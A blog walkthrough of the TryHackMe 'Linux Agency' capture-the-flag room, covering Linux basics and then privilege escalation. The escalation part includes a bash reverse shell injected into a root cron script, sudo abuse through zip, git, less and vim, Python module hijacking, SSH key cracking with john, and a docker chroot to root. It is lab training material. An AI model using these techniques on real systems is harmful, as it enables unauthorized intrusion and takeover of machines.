Linux Agency TryHackme Writeup

Shamsher khan
10 min readMay 19, 2021

By Shamsher Khan, This is a Writeup of Tryhackme room “Linux Agency”

Welcome to Linux Agency. Agent 47, this is where you will need to go through several tests concerning linux fundamentals and privilege escalation techniques.

This room is proudly made by 0z09e and Xyan1d3

If you enjoy this room, please let us know by tagging us on Twitter. You may also contact us in case of some unintended routes or bugs, and we will be happy to resolve them.

Please wait about 1 minute before SSH’ing into the box.

SSH Username : agent47

SSH Password : 640509040147

Each flag found will serve as the password for the next user. The flag includes the username of the next user that is part of this challenge. The Flag format is : username{md5sum}

The order of users: agent47 → mission1 → mission30 will be part of Task 3: Linux Fundamentals.

After those missions, the next levels will be in Task 4: Privilege Escalation.

SSH into the box as agent47

ssh agent47@

Agent 47, we are ICA, the Linux Agency. We will test your Linux Fundamentals. Let’s see if you can pass all these challenges of basic Linux. The password of the next mission will be the flag of that mission. Example: mission1{1234567890} will be the password for the mission1 user.

Important Note:-

Find directory name

find / -type d -name "mission1" 2>/dev/null

Find File name

find / -type f -name "mission1" 2>/dev/null

Find Single word in whole system

grep -r "mission1" / 2>/dev/null

Find word in hidden folder

grep -r mission1 * .[^.]* 2>/dev/null

Question 1. What is the mission1 flag?

Let’s go try every method here one by one

Now find a string “mission1” in hidden directory Example:- .folder

So Now we Have

User => mission1
password => mission1{17********************f0}

Now we turn into mission1 user. Lets find mission 2 flag

Question 2. What is the mission2 flag?

So Now we Have

User => mission2
password => mission2{8a********************0d}

Now we turn into mission2 user. Lets find mission 3 flag

Question 3. What is the mission3 flag?

So Now we Have

User => mission2
password => mission3{ab********************76}

Now we turn into mission3 user. Lets find mission 4flag

Question 3. What is the mission4 flag?

try nano flag.txt

Question 4. what is mission5 flag

Question 5. what is mission6 flag

Question 6. what is mission7 flag

Question 7. what is mission8 flag

Question 8. what is mission9 flag

Question 9. what is mission10 flag

Question 10. what is mission11 flag

Question 11. what is mission12 flag

Hint says EVS that menas Environment system

Question 12. what is mission13 flag

Question 13. what is mission14 flag

Question 14. what is mission15 flag

Question 15. what is mission16 flag

Hex to Text convert

Question 16. what is mission17 flag

its look like binary file because of ELF word in file

Question 17. what is mission18 flag

So its Java file

Question 18. what is mission19 flag

Question 19. what is mission20 flag

Question 20. what is mission21 flag

In the deploy machine there is no python tool so copied the code and run on own kali linux , and then run program

flag = ">:  :<=ab(d76dfe2210fak1gge5e61`kgbj`bk5c0."
for i in range(len(flag)):
flag = (flag[:i] + chr(ord(flag[i]) ^ ord("S")) +flag[i + 1:]);
print(flag[i], end = "");

Question 21. what is mission22 flag

Get TTY Shell

script -qc /bin/bash /dev/null

Question 22. what is mission23 flag

Question 23. what is mission24 flag

Question 24. what is mission25 flag

Question 25. what is mission26 flag

su mission26
su mission26

Question 26. what is mission27 flag

Question 27. what is mission28 flag

Question 28. what is mission29 flag

Question 29. what is mission30 flag

What is viktor’s Flag?

Task 4. Privilege Escalation

What is dalia’s flag?

Let’s find suspicious file in system. when we review /etc/crontabs, something looks like interesting:

Now Check this script, and also we have permission to execute this script and cronjob per minute. One more thing, script is same with the output of the decode of the base64 decode.

Let’s add our reverse shell here

Now start netcat listener

bash -i >& /dev/tcp/ 0>&1

you have only 30 seconds to add shell and get reverse shell otherwise your file will be reset and you need add shell again

BOOM ! we got shell

tty shell

But its not proper interactive shell . To get tty shell we do this kind of things

  • The first thing: to do is use script -qc /bin/bash /dev/null, which uses Python to spawn a better-featured bash shell. At this point, our shell will look a bit prettier, but we still won’t be able to use tab autocomplete or the arrow keys, and Ctrl + C will still kill the shell.

-Step two is: export TERM=xterm — this will give us access to term commands such as clear.

-Finally (and most importantly) we will background the shell using Ctrl + Z. Back in our own terminal we use stty raw -echo; fg. This does two things: first, it turns off our own terminal echo (which gives us access to tab autocompletes, the arrow keys, and Ctrl + C to kill processes). It then foregrounds the shell, thus completing the process.
-Note that if the shell dies, any input in your own terminal will not be visible (as a result of having disabled terminal echo). To fix this, type reset and press enter.

What is silvio’s flag?

We have sudo rights

Run as silvio with sudo, you’ll gain silvio:


TF=$(mktemp -u)
sudo -u silvio zip $TF /etc/hosts -T -TT 'sh #'

What is reza’s flag?

We have sudo rights again for another command


sudo -u reza PAGER='sh -c "exec sh 0<&1"' git -p
python3 -c 'import pty;pty.spawn("/bin/bash")'

What is jordan’s flag?

When review the sudo rights, we see /opt/scripts/ script. If we execute it, we get a message which there is no shop module in the below:

But we can add this module to a directory like /tmp which each user and services access:

You can do whatever you want. You can try to get a revershell or bindshell. Hereby the most significant point is the right which /opt/scripts/ script runs with jordan permission:

Run as jordan with sudo /opt/scripts/ sudo -u jordan PYTHONPATH=/tmp/shop/ /opt/scripts/

What is ken’s flag?

Check sudo rights:

Run as ken: sudo -u ken less /etc/profile

Add !/bin/sh to the page which popped up.

What is sean’s flag?

Check the sudo rights one more time: -> (a)

Run as sean: sudo -u sean vim -c ‘:!/bin/sh’

script -qc /bin/bash /dev/null

What is penelope’s flag?

What is maya’s flag?

the owner of base64 file is maya

Check it on gtfobins:

What is robert’s Passphrase?

Check old_robert_ssh directory:

Copy id_rsa with scp on your local machine, convert id_rsa into hash using /usr/share/john/ssh2john and finally crack it with john like in the below

What is user.txt?

Use ss of network tool to monitorize ports on victim machine: ss -tulpn

Number of port 2222 looks like handful:

Sudo Security Bypass room

( for Sudo Security Bypass on exploit-db ( and also you can check here:

Now we are root with privileges:

What is root.txt?

We check users on the system but mission users and others don’t appear:

./docker ps -a
./docker image ls
./docker run -v /:/mnt --rm -it mangoman chroot /mnt sh

You can find me on:


For more walkthroughs stay tuned…
Before you go…

Visit my other walkthrough’s:-

and thank you for taking the time to read my walkthrough.
If you found it helpful, please hit the 👏 button 👏 (up to 40x) and share
it to help others with similar interests! + Feedback is always welcome!



Shamsher khan

Web Application Pen-tester || CTF Player || Security Analyst || Freelance Cyber Security Trainer